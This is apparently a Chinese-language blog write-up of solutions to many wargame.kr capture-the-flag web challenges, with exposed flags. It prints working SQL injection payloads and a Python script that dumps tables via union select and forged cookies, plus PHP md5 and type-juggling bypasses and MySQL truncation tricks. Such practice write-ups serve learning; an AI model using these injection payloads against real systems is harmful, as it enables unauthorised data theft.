只有週末可以做一做來着
already got
FLAG:3f271a824852c299e2aa7dde0f3d1d6150527cc9QR Code Puzzle
首先看到一個這玩意
矇蔽了,難道是拼圖…
肯定不是自己去拼…找源碼看到了圖片的位置
http://wargame.kr:8080/qr_code_puzzle//img/qr.png
Flag is : e0b5b5c5939d3a041f570a267d8f6af6d336686cflee button
真是夠了,首頁一個按鈕想要按倒,機智的我都用了手機了,但是沒用,直接看源碼,沒啥特別的啊!但是看了一下發現這個
而且晃動鼠標的時候還會跟着變化~查一下資料css 中position如下
這個隨着鼠標移動應該是eval那句話所賜,我們去掉position這句就可以發現button固定了。點擊得到flag,這屬於前端修改的題目
good! Flag is : 7f7d57ba6486e5a1e9021f7cc3cbaf8aada38e71login filtering
首先得到源碼
<?php
if (isset($_GET['view-source'])) {
show_source(__FILE__);
exit();
}
/*
create table user(
idx int auto_increment primary key,
id char(32),
ps char(32)
);
*/
if(isset($_POST['id']) && isset($_POST['ps'])){
include("../lib.php"); # include for auth_code function.
mysql_connect("localhost","login_filtering","login_filtering_pz");
mysql_select_db ("login_filtering");
mysql_query("set names utf8");
$key = auth_code("login filtering");
$id = mysql_real_escape_string(trim($_POST['id']));
$ps = mysql_real_escape_string(trim($_POST['ps']));
$row=mysql_fetch_array(mysql_query("select * from user where id='$id' and ps=md5('$ps')"));
if(isset($row['id'])){
if($id=='guest' || $id=='blueh4g'){
echo "your account is blocked";
}else{
echo "login ok"."<br />";
echo "Password : ".$key;
}
}else{
echo "wrong..";
}
}
?>
<!DOCTYPE html>
<style>
* {margin:0; padding:0;}
body {background-color:#ddd;}
#mdiv {width:200px; text-align:center; margin:50px auto;}
input[type=text],input[type=[password] {width:100px;}
td {text-align:center;}
</style>
<body>
<form method="post" action="./">
<div id="mdiv">
<table>
<tr><td>ID</td><td><input type="text" name="id" /></td></tr>
<tr><td>PW</td><td><input type="password" name="ps" /></td></tr>
<tr><td colspan="2"><input type="submit" value="login" /></td></tr>
</table>
<div><a href='?view-source'>get source</a></div>
</form>
</div>
</body>
<!--
you have blocked accounts.
guest / guest
blueh4g / blueh4g1234ps
-->看到首先是源碼的末尾存在帳號密碼
關鍵語句如下
...
$id = mysql_real_escape_string(trim($_POST['id']));
$ps = mysql_real_escape_string(trim($_POST['ps']));
$row=mysql_fetch_array(mysql_query("select * from user where id='$id' and ps=md5('$ps')"));
if(isset($row['id'])){
if($id=='guest' || $id=='blueh4g'){
echo "your account is blocked";
}else{
echo "login ok"."<br />";
echo "Password : ".$key;
}
...因爲過濾了…注入幾乎是不可能的…但是我們看到帳號和密碼是開的,而數據庫的特性不分大小寫嗯,然後過濾僅僅是帳號!那麼我們帳號用大小寫繞過,密碼不變即可
Password : fabe12ce1829b8c7b1a3cf2eb8f94d13abe0820fWTF_CODE
發現是whitespace,這個是2014年的題目了嗯
找到一個解密網站
http://ws2js.luilak.net/interpreter.html
Wow! Key is 1cc49fa63caf553bd0d75b7b38f818118528a988 (this key is for [] only..)爲了一方萬一收藏了一段python的解密代碼
def t2i(str):
out = 0
for i in range(0,8):
out += int(str[i])*(2**(7-i))
return out
f = open('source_code.ws','r')
x = f.readline()
ans=""
k = 0
while x:
out = ''
for c in x:
if c==' ':
out += '0'
else:
out += '1'
x = f.readline()
l = len(out)
if 8 <= l <= 11 and k%2 ==0:
print out
c = t2i('0'+out[l-8:l-1])
ans+= chr(c)
k+=1
f.close()
print ans學習了
DB is really GOOD
這個題目什麼鬼…沒有源碼,只能對着兩個可以輸入的地方嘗試特殊字符,在首頁輸入/之後報錯
再構造如下
user_id=asd/
返回
<br />
<b>Fatal error</b>: Uncaught exception 'Exception' with message 'Unable to open database: unable to open database file' in /home/www/db_is_really_good/sqlite3.php:7
Stack trace:
#0 /home/www/db_is_really_good/sqlite3.php(7): SQLite3->open('./db/wkrm_asd/....')
#1 /home/www/db_is_really_good/memo.php(14): MyDB->__construct('./db/wkrm_asd/....')
#2 {main}
thrown in <b>/home/www/db_is_really_good/sqlite3.php</b> on line <b>7</b><br />可以看出來這是在構造一個訪問路徑,然後我們嘗試admin的時候發現
猜測就是哪個路徑吧…然後這裏訪問不到我們直接用瀏覽器打開就行了
隨便打開一看
http://wargame.kr:8080/db_is_really_good/dhkdndlswmdzltng.php
fly me to the moon
需要你分數足夠高嗯,以爲是代碼中暗藏玄機,大5000行代碼啊!!!但是發現並不是…它每次遊戲完成後會發送分數…
日修改分數即可,什麼破題…
md5_compare
首先看到源代碼如下
<?php
if (isset($_GET['view-source'])) {
show_source(__FILE__);
exit();
}
if (isset($_GET['v1']) && isset($_GET['v2'])) {
sleep(3); // anti brute force
$chk = true;
$v1 = $_GET['v1'];
$v2 = $_GET['v2'];
if (!ctype_alpha($v1)) {$chk = false;}
if (!is_numeric($v2) ) {$chk = false;}
if (md5($v1) != md5($v2)) {$chk = false;}
if ($chk){
include("../lib.php");
echo "Congratulations! FLAG is : ".auth_code("md5_compare");
} else {
echo "Wrong...";
}
}
?>
<br />
<form method="GET">
VALUE 1 : <input type="text" name="v1" /><br />
VALUE 2 : <input type="text" name="v2" /><br />
<input type="submit" value="chk" />
</form>
<br />
<a href="?view-source">view-source</a>
就是一個簡單的md5匹配,默默地拿出來自己的記錄搜索到
如下
http://wargame.kr:8080/md5_compare/?v1=QNKCDZO&v2=240610708md5 password
還是md5?明顯原來的某題,帶鹽的md5加密構造注入!!!但是我爲啥找不到了…在這裏再記錄下
ffifdyop
md5後,276f722736c95d99e921722cf9ed621c
再轉成字符串: 'or'6<trash>
意圖很明顯了嗯
strcmp
這個…嗯…太基礎了…
type confusion
<?php
if (isset($_GET['view-source'])) {
show_source(__FILE__);
exit();
}
if (isset($_POST['json'])) {
usleep(500000);
require("../lib.php"); // include for auth_code function.
$json = json_decode($_POST['json']);
$key = gen_key();
if ($json->key == $key) {
$ret = ["code" => true, "flag" => auth_code("type confusion")];
} else {
$ret = ["code" => false];
}
die(json_encode($ret));
}
function gen_key(){
$key = uniqid("welcome to wargame.kr!_", true);
$key = sha1($key);
return $key;
}
?>猛一看還是很嚇人的,碰巧雞哥來了一下宿舍順手搞了一下,弱類型比較,數字和字符串可以相等嗯,雖然是$key是隨機的,但是隻要我們碰撞試前面的數字相同就可以了嗯
會發現本地實驗通過,但是並不可以在瀏覽器通過,用burp抓包來着嗯,多試試啊!
tmitter
這個很明顯了嗯
you need login with "admin"s id!
===========================
create table tmitter_user(
idx int auto_increment primary key,
id char(32),
ps char(32)
);就是因爲mysq數據截斷,可以申請一個賬號
admin a然後截斷就成了admin,通過修改密碼成功修改密碼嗯,然後登陸得到flag
SimpleBoard
說是union注入…emmmm
感覺莫名其妙的,真的以爲是update是注入點…結果並不是,關鍵代碼是如下的,看了狗哥的做法發現真特麼…
public function read($idx){
$idx = mysql_real_escape_string($idx);
if ($this->read_chk($idx) == false){
$this->inc_hit($idx);
}
return $this->db->get_query("select * from {$this->table} where idx=$idx");
}
private function read_chk($idx){
if(strpos($_COOKIE['view'], "/".$idx) !== false) {
return true;
} else {
return false;
}
}發現其實這是脆弱的,如何返回true?其實就是從cookie中驗證了一下!只要cookie中的內容是/加上url內容即可,我們做以下嘗試
GET /SimpleBoard/read.php?idx=0%20union%20select%201,1,1,1 HTTP/1.1
Host: wargame.kr:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://wargame.kr:8080/SimpleBoard/
Cookie: view=%2F0%20union%20select%201,1,1,1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
得到
然後就是注入任我行了,直接上腳本
#_*_ coding:utf-8 _*_
import requests
import urllib
import re
url = 'http://wargame.kr:8080/SimpleBoard/read.php?idx='
for i in range(100):
#content = '0%20union%20select%201,1,1,table_name%20FROM%20information_schema.tables%20limit%20'+str(i)+',1'
#content = '0%20union%20select%201,1,1,column_name%20FROM%20information_schema.columns%20where%20table_name=0x524541444d45%20limit%20'+str(i)+',1'
content = '0%20union%20select%201,1,1,flag%20FROM%20README%20limit%20'+str(i)+',1'
urlnew=url+content
cookies = {'view':'/'+content}
html = requests.post(url=urlnew,cookies=cookies).text
html = re.findall(r'<td colspan=3>(.*?)</td>',html,re.S)[0]
if html!='':
print html
else :
break
#table README
#columns flagweb chatting
看到題目首先真的一頭霧水,一看源碼,難道是異步傳輸的東西?
但是人家明明說是注入,然後發現源碼中存在一些網址,嗯
chatlog.php?t=1
chatview.php?t=1&ni=
chatlog.php?data=1嘗試發現第二個存在注入…構造
http://wargame.kr:8080/web_chatting/chatview.php?t=1&ni=0%20union%20select%201,2,3,4,5%23
發現第2、3列是注入點(當然也可以盲注,但是費勁死了…)
然後就是任我行了
//爆表
http://wargame.kr:8080/web_chatting/chatview.php?t=1&ni=0%20union%20select%201,table_name,3,4,5%20from%20information_schema.tables%23
//爆列
http://wargame.kr:8080/web_chatting/chatview.php?t=1&ni=0%20union%20select%201,column_name,3,4,5%20from%20information_schema.columns%20where%20table_name=0x636861745f6c6f675f736563726574%23
//爆字段
http://wargame.kr:8080/web_chatting/chatview.php?t=1&ni=0%20union%20select%201,readme,3,4,5%20from%20chat_log_secret%20%23pyc decompile
這個以爲是逆向題,但是也不算是,是python關於時間種子的東西,首先我們可以得到pyc文件,打開一瞬間貌似訪問了服務器網址,然後直接用easy python compiler去逆向出來程序如下
import time
from sys import exit
from hashlib import sha512
def main():
print 'import me :D'
def GIVE_ME_FLAG(flag):
if flag[:43] != 'http://wargame.kr:8080/pyc_decompile/?flag=':
die()
flag = flag[43:]
now = time.localtime(time.time())
seed = time.strftime('%m/%d/HJEJSH', time.localtime())
hs = sha512(seed).hexdigest()
start = now.tm_hour % 3 + 1
end = start * (now.tm_min % 30 + 10)
ok = hs[start:end]
if ok != flag:
die()
print 'GOOD!!!'
def die():
print 'NOPE...'
exit()
if __name__ == '__main__':
main()這個得到了這個就沒什麼好說的了嗯…就是利用了時間戳製造了一個散列值啥的,直接上腳本即可,時間還是相當寬鬆的嗯
#_*_ coding:utf-8 _*_
import time
from sys import exit
from hashlib import sha512
import re,urllib
url = 'http://wargame.kr:8080/pyc_decompile'
html = urllib.urlopen(url).read()
content = re.findall(r'2017/(.*?)/(.*?) (.*?):(.*?):',html,re.S)
hour = str(content[0][2])
minite = str(content[0][3])
seed = content[0][0]+'/'+content[0][1]+'/HJEJSH'
hs = sha512(seed).hexdigest()
start = int(hour) % 3 + 1
end = start * (int(minite) % 30 + 10)
ok = hs[start:end]
newurl = url+'/?flag='+ok
html = urllib.urlopen(newurl).read()
print html
#print newurl 實在不行可以用這個生成url再手動訪問一下img recovery
看題面
Recovery the PNG image file!
but.. is this really "PNG" file?
(NO STEGANOGRAPHY. THIS IS FORENSIC CHALLENGE)引起了深深的懷疑,binwalk一發
發現了zlib數據來着,但是嘗試去解碼沒什麼效果,然後繼續看hex值…沒發現,參考了大神方法…原來是…
然後搜索一下…
japan r119發現是一種文件格式
然後就需要解密這個apng了
http://animizer.net/en/gif-apng-splitter
然後得到兩個圖片,拼接一下即可,用stagsolve.jar神器異或一下即可,但是得到的二維碼黑白顛倒,最簡單的扣扣發一下,然後選中一下即可
得到內容
WHAT!@#$?輸入網站即可
這算哪門子web…